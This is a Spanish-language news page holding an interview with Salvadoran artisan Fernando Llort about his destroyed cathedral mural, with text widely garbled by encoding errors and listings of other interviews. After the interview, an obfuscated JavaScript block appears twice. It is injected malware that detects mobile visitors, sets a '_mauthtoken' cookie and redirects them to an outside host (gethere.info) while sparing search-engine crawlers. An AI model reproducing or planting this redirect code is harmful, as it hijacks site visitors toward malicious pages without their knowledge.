Entrevistas

20 Ene 2016
Entrevistas | Por: Redacción

ai???El mural no solo me pertenecAi??a a mAi??, sino a todo el pueblo salvadoreAi??oai??? ai??i?? Fernando Llort, artesano

Fue a finales de los 90 que el artesano Fernando Llort recibiA? una de las noticias mA?s importantes de su trayectoria artAi??stica, que marcarAi??a un tiempo no solo en su vida, sino tambiAi??n para el desarrollo e identidad salvadoreAi??a: el mural de catedral metropolitana ai???La armonAi??a de mi puebloai???. A cuatro aAi??os de su destrucciA?n, te invitamos a que conozcA?s mA?s sobre la opiniA?n del artista y creador de este patrimonio cultural.

Texto y fotografAi??as: Sara JimAi??nez/MEDIOLLENO

Como contexto, nos podrAi??a comentar un poco cA?mo fue el proceso para la construcciA?n del mural.

Para comenzar se creA? una fundaciA?n que se llamA? ai???FundaciA?n Catedralai???, que estaba compuesta por varios miembros, socios que querAi??an restaurar la catedral, junto con el que en ese momento era el arzobispo Ai??Fernando SA?enz Lacalle, porque despuAi??s del terremoto no la habAi??an restaurado. Esta fundaciA?n se dedicA? a recaudar fondos para la construcciA?n de catedral, que dentro de esta entraba el tema de la ornamentaciA?n o las pinturas. Para ello, se comunicaron con dos arquitectos espaAi??oles especializados en cuestiones de iglesias. Fue asAi?? como estos expertos comenzaron a estudiar la identidad salvadoreAi??a y las iglesias en otros paAi??ses de LatinoamAi??rica y, para ellos, lo que resaltaba era el tema del color, eso las identificaba.

Fue asAi?? como decidieron que era yo quiAi??n deberAi??a hacer ese trabajo, por el tema del color. Visitaron mi casa y mi estudio y ellos hicieron unos bocetos de quAi?? era lo que querAi??an y resultA? que eran lo que yo ya tenAi??a en mente y ya lo habAi??a hecho.

A?QuAi?? significA? para usted conocer esta noticia?

Al conocer la decisiA?n de que serAi??a yo quien estarAi??a a cargo de este gran proyecto, para mAi?? fue un gran honor y un gran orgullo. Ha sido la gran obra maestra de mi vida. AdemA?s, era algo que yo le querAi??a dedicar a MonseAi??or Romero y aceptamos el reto. Yo me levantaba todas las madrugas a hacer los planos de catedral, de lo que iba hacer el mural y poco a poco, con la iluminaciA?n de Dios fue surgiendo el mural.

fernando

De dA?nde surgiA? el nombre: ai???La armonAi??a de mi puebloai???

Tuve el privilegio de conocer a MonseAi??or Romero y siempre tuve la impresiA?n, y me lo demostrA?, que lo que realmente querAi??a, era la armonAi??a en el pueblo, en todo El Salvador; que ya no hubiera luchas y tratar de llevar el evangelio a la vida, es decir, la armonAi??a a la vida. AdemA?s, ai???La armonAi??a de mi puebloai??? era lo mA?s acorde al tema que iba a representar en el mural.

A?Se le presentA? algA?n tipo de obstA?culo en cuanto al proceso de la construcciA?n del mural?

No, ningA?n tipo de problemas. Lo que pasaron fueron pequeAi??os accidentes, como por ejemplo que llegara una rA?faga de viento y se quebraran uno azulejos y habrAi??a que volverlos hacer, o ya al estar hechos a mAi?? no me parecAi??a algo y lo cambiA?bamos. Sin embargo, no fueron dificultades mayores, porque la dibujada la fuimos haciendo aquAi?? en mi casa y los azulejos los hacAi??amos en el taller de cerA?mica en ai???El A?rbol de Diosai???; me ayudaba MarAi??a JosAi?? (mi hija), Fernando (mi hijo) y otro amigo de mi hijo. Todo este proceso durA? un aAi??o.

3.1

A?CA?mo describirAi??a ese proceso o experiencia de construcciA?n del mural?

Una gran alegrAi??a y satisfacciA?n al realizar todo eso y, por supuesto, un gran orgullo.

TrasladA?ndonos a lo ocurrido en el aAi??o 2011, al enterarse de la destrucciA?n del mural A?quAi?? ocurriA? en Fernando Llort?

SurgiA? una enorme tristeza, sentimientos encontrados como confusiA?n y cuestionamientos de por quAi?? lo habAi??an hecho, porque era algo muy significativo para mAi?? y sAi?? que para muchos salvadoreAi??os tambiAi??n. LleguAi?? a sentir como un gran luto, como cuando se le muere a uno algA?n pariente. Realmente fue algo muy duro para mAi?? y hasta la fecha es algo que todavAi??a lo recuerdo con tristeza, porque es un recuerdo que no olvidarAi?? nunca.

A?QuAi?? tipo de argumentaciones recibiA?, tanto de la iglesia como de las instituciones que velan por la protecciA?n de los bienes culturales?

Por parte de la iglesia, lo que me dijeron fue que se podAi??a caer un azulejo y lastimar a las personas que transitaban por ahAi??. Por otro lado, la Secretaria Nacional de Cultura, al inicio me apoyaba, pero despuAi??s se pusieron en un plan de ya no meterse mA?s, de dejarlo asAi?? como estaba y realmente no sAi?? por quAi?? razA?n.

3.2

Al recibir este tipo de argumentaciones, Fernando Llort mantuvo una postura, A?cuatro aAi??os despuAi??s, la mantiene?

SAi??, que eran mentiras todas; porque han pasado los aAi??os y el tema ya no surgiA?, nadie dijo nada. AhAi?? se quedA? y ya no estA? mA?s.

DespuAi??s de la destrucciA?n del mural, A?ocurriA? algo positivo o favorable en la vida artAi??stica de Fernando Llort?

SAi??, a raAi??z de eso se podrAi??a decir que surgieron cosas buenas. RealicAi?? otros proyectos, fue una gran satisfacciA?n que Dios me permitiA? que yo los realizara; como por ejemplo la cruz Romero que realicAi?? para la Catedral San Jorge en Inglaterra. Es una cruz que yo la diseAi??Ai?? y medAi??a 5 x 4 metros.

A?QuAi?? significA? para Llort todo el apoyo recibido por la poblaciA?n?

Fue algo gratificante, porque mucha gente que venAi??a de lejos, junto a mi familia y amigos, protestaron, ya que no estaban de acuerdo con lo ocurrido; a eso sumAi??mosle el apoyo de parte de todos los vendedores que estA?n ubicados frente a catedral, que tambiAi??n realizaron protestas solicitando una explicaciA?n. Fue algo que a mAi?? me llenA? de alegrAi??a, porque me di cuenta de que el mural no me pertenecAi??a a mAi??, sino a todo el pueblo, porque su destrucciA?n despertA? indignaciA?n en la sociedad.

3.3

QuAi?? mensaje les enviarAi??a a los jA?venes que son parte del desarrollo cultural en el paAi??s, para motivarlos a que se sientan parte de todo los bienes culturales que nos rodean.

Yo los invito a que protejan los valores culturales que tenemos, a que protejan a los artesanos, a los artistas, ya que hay una ley, pero hasta cierto punto no se cumple y son los jA?venes los que deben de tratar de cambiar la situaciA?n. Que se pongan las pilas para que hagan del arte un medio de vida, porque sAi?? se puede vivir de eso, lo que ocurre es que no se le brinda el apoyo necesario.

3.4

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

11 May 2018
Ernesto Otero- Joven  salvadoreño que nos representará ante líderes mundiales en Bruselas
Entrevistas | Por: Redacción

Ernesto Otero- Joven salvadoreño que nos representará ante líderes mundiales en Bruselas

7 May 2018
No hay analista polA�tico, ni politA?logo que sepa tanto de Nuevas Ideas como su servidora�� Walter Araujo
Entrevistas | Por: Redacción

No hay analista polA�tico, ni politA?logo que sepa tanto de Nuevas Ideas como su servidora�� Walter Araujo

21 Mar 2018
a�?No hay ningA?n paA�s que se pueda jactar de estar fuera del radar de la corrupciA?na�? – Rodrigo Mora, exSecretario Ejecutivo de la ComisiA?n de Probidad y Transparencia de la Presidencia de Chile
Entrevistas | Por: Redacción

a�?No hay ningA?n paA�s que se pueda jactar de estar fuera del radar de la corrupciA?na�? – Rodrigo Mora, exSecretario Ejecutivo de la ComisiA?n de Probidad y Transparencia de la Presidencia de Chile

13 Mar 2018
a�?Cuando nacA� me dieron seis aA�os de vida, gracias a Dios ya cumplA� los 44 aA�osa�?- Eeileen Romero, candidata electa por San Salvador del PCN
Entrevistas | Por: Redacción

a�?Cuando nacA� me dieron seis aA�os de vida, gracias a Dios ya cumplA� los 44 aA�osa�?- Eeileen Romero, candidata electa por San Salvador del PCN